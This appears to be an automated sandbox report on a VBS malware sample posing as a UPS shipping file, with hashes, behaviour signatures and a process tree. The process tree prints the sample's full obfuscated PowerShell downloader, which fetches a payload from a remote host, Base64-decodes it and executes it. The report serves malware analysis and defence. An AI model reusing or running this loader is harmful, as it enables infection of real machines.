Analysis
-
max time kernel
131s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
27-06-2024 07:00
Static task
static1
Behavioral task
behavioral1
Sample
ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs
Resource
win10v2004-20240611-en
General
-
Target
ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs
-
Size
187KB
-
MD5
a408481803f47324f6479a3b70ad763b
-
SHA1
1a3232aeec010ce287ea65dd1a24255f95470d48
-
SHA256
4573cff18a16eacc05034a4de1e11330c71331b15169d4249e8b04f3ab67c2bf
-
SHA512
aab87aee34a0c93381fb0fb926edc137ffced40bba470b15dd45b798aeab9117f5a4daf30932dccef13c5c898d80f626e18a1a65d8c10b2c111319bb781f341e
-
SSDEEP
3072:dmN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZg:d08GxbKja3+DCbKCvBB/WnHXC/sLJFJN
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 8 2668 powershell.exe 10 2668 powershell.exe 12 2668 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2668 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 1720 wrote to memory of 2668 1720 WScript.exe powershell.exe PID 1720 wrote to memory of 2668 1720 WScript.exe powershell.exe PID 1720 wrote to memory of 2668 1720 WScript.exe powershell.exe PID 2668 wrote to memory of 2324 2668 powershell.exe cmd.exe PID 2668 wrote to memory of 2324 2668 powershell.exe cmd.exe PID 2668 wrote to memory of 2324 2668 powershell.exe cmd.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Alcoa Restauranterne Evnesvag Cistophoric Frisvmmere Baroscopic151 Colaers Maney Lyngbyaceae Overripen224 Fuldtidsjob Tjenestemndenes Rowet Skolealderens188 Slouchily emulsible Bghjortenes Tabescence Brandtomts Pelotas Branchial Forbisetes salamis Predamaged3 Alcoa Restauranterne Evnesvag Cistophoric Frisvmmere Baroscopic151 Colaers Maney Lyngbyaceae Overripen224 Fuldtidsjob Tjenestemndenes Rowet Skolealderens188 Slouchily emulsible Bghjortenes Tabescence Brandtomts Pelotas Branchial Forbisetes salamis Predamaged3';$Betnkelighederne = 1;Function Fellatrices($Trucing){$Farcically232=$Trucing.Length-$Betnkelighederne;$Leukocytotic64='SUBSTRIN';$Leukocytotic64+='G';For( $gracileness=1;$gracileness -lt $Farcically232;$gracileness+=2){$Alcoa+=$Trucing.$Leukocytotic64.Invoke( $gracileness, $Betnkelighederne);}$Alcoa;}function Interalar47($Weather){ . ($Terrnlbets253) ($Weather);}$talesituationens=Fellatrices ' MFo zsiKl.lNa / 5..D0. H( WSilnNd.o w sI NDT .1 0F. 0H;N TW.iTn 6h4R; Sx.6L4.;C RrAv :S1i2M1S.C0S)R BGAeTc k oA/ 2.0D1R0 0.1Y0,1 ,F iCrDeRfFo xL/H1f2S1T. 0E ';$Stilkunstnernes=Fellatrices 'FUUsleOrU-HATgTe n t ';$Frisvmmere=Fellatrices '.h,tit.pBs :./K/le.vCoTlEu xPc.o nSt.a baiFl i dnaVd.eO. c o mR.Kb.rC/pbLr,/,K osn kBuDrKr eTnTc,eCe vNn.eFn,.Fd wKpK> hWtNtIpR:B/ / 9 4v..1 5B6 . 7G9...2D1s1P/ K.oFn kCuUrBr eTnOcTe,eRvvn ePn .Od wUp ';$Constantia228=Fellatrices 'E>R ';$Terrnlbets253=Fellatrices 'TiSe xR ';$Yearock='Maney';$Smittle = Fellatrices ' eAcNh o, V%.a p pCdSa t,aw% \,RDe p,s e,tB.BKAb m. C&,&. ,ePcNhNo, At ';Interalar47 (Fellatrices 'P$UgMlPoRb aIlB:SL iPbPeBlElAi,sNts=.(ScAmId, S/ cL P$ S.m iPt tPl,e )A ');Interalar47 (Fellatrices ' $ g l oFb.a.l.:,CmiSsTt o pVh,ohr.iTc =.$ F,r.iUs.vVm mFeDrTeF. sMpsl i t,(B$ICto nVsTtAaRn tKina.2 2 8,) ');Interalar47 (Fellatrices 'p[VN e.t.. SSeKr,v iTckeSPFoOiCnSt MSaFn.a gdeSr ],:F: SAeCcIuIr.iEt ySP rLoTtEo cTo lT .=F K[ N,eUti.,SAe,c u r i tAyRPKr o t o,c opl TAy pue ]U:W: Tal s 1,2 ');$Frisvmmere=$Cistophoric[0];$Snidely= (Fellatrices ' $DgKl,o,bBa.lP: pTr.oVpNeMl lNeSrCsC=.NBeBw.-BOUb jIeGc t, SAy s tAeFm..DNEe tH.AWPePb,CLl iTe n t');$Snidely+=$Libellist[1];Interalar47 ($Snidely);Interalar47 (Fellatrices 'H$SpCrToEpde lElDeSrLsR.TH e a d eVr sB[k$ S.tUi lNk.uFnUsNt nAeNr nbeHs ],= $EtPa lKe sFiStTuSaBtBi o n eAn s ');$Hotheartedness=Fellatrices 'C$ pDr,oDpeeSlClPe,r s.. D o.w n,lSo aPdFFBiFlAeH( $UFUr.i sVvMm m eprSeE, $LFUo rSb iFs,e t,e s.)L ';$Forbisetes=$Libellist[0];Interalar47 (Fellatrices 'F$Kg lSoSb a l : I,n dVu,s.tOrBiPm.i nsi sstBrCe.nBeDs,=U(PTNe.sWt - PAaItSh. S$ F oPrObSi,s.e t.e sI). ');while (!$Industriministrenes) {Interalar47 (Fellatrices '.$ g lPo.b aMl,: b,aFgFtSa laeMr =S$GtArSu.e ') ;Interalar47 $Hotheartedness;Interalar47 (Fellatrices ' Smt.a rMtC- S lLeZeDps 4R ');Interalar47 (Fellatrices ' $ gEl o,bNaBl :PIsn d,u sVtUr i m iRn i s t r ecnEe sD= (,TRe sPtA-LPLa t h $ F oBrUbLi,s,e t,e sS)r ') ;Interalar47 (Fellatrices ' $DgNlCo bDaOlR:RE v n.e sAv.aBgv=,$ g,l,oBb,aIla:.RFegs t.aKu rSa nPtTe,rKnSe.+G+ % $EC,i swtKoUpchGo.rSiscS.NcNo,uLnLt, ') ;$Frisvmmere=$Cistophoric[$Evnesvag];}$Knallertfreren=362845;$tolkningsrammerne=26102;Interalar47 (Fellatrices 'P$,gOlCo bNa.lH: Ldy.nDgDb y,a c e a.e, U= NGRe tl-SCEoTn t.e n t. D$ FIo r bLiEs eAt e s ');Interalar47 (Fellatrices ' $Tgwl,o,bBaSl : P.e,lEoOrKi,aKn T= [RSTy sPt,ePmS. C.oSn,vIe.rSt ].:R:.F r o.mGBVa sFeC6 4 S tVrNiBn gI(A$ILAyHnVgIb y a c eCaHe ). ');Interalar47 (Fellatrices 'F$Mg l oPbOa,lO:CT j eMnTeLsAtAeWm nBd eFn eLs, =S .[RSGy.s t eemK.MT eKx.t . E,nScOo.d.i nMg,],:A:LADSRCAIUIB. G eSt S,tPrFiIn g,(a$,Pse,l oCrFiMaSn )B ');Interalar47 (Fellatrices 'M$FgSl.oSb a.l :PF o rHdBr.iAnPgNsBh a,v.e.r.eC1,8K0.= $CT.j.ePn.eSs tDeSmVn d e nUeBs .psFu bSsFt,r iAn,gB( $,K,n.aFlIl.eAr.t f,rOe.r,e n ,,$VtEoOl,kGnGiun g sBr aIm.mBe,rAn e.) ');Interalar47 $Fordringshavere180;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Repset.Kbm && echo t"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2668-11-0x000007FEF588E000-0x000007FEF588F000-memory.dmpFilesize
4KB
-
memory/2668-12-0x000000001B5F0000-0x000000001B8D2000-memory.dmpFilesize
2.9MB
-
memory/2668-13-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmpFilesize
9.6MB
-
memory/2668-14-0x0000000001CA0000-0x0000000001CA8000-memory.dmpFilesize
32KB
-
memory/2668-15-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmpFilesize
9.6MB
-
memory/2668-16-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmpFilesize
9.6MB
-
memory/2668-17-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmpFilesize
9.6MB
-
memory/2668-18-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmpFilesize
9.6MB
-
memory/2668-19-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmpFilesize
9.6MB
-
memory/2668-20-0x000007FEF588E000-0x000007FEF588F000-memory.dmpFilesize
4KB
-
memory/2668-21-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmpFilesize
9.6MB
-
memory/2668-22-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmpFilesize
9.6MB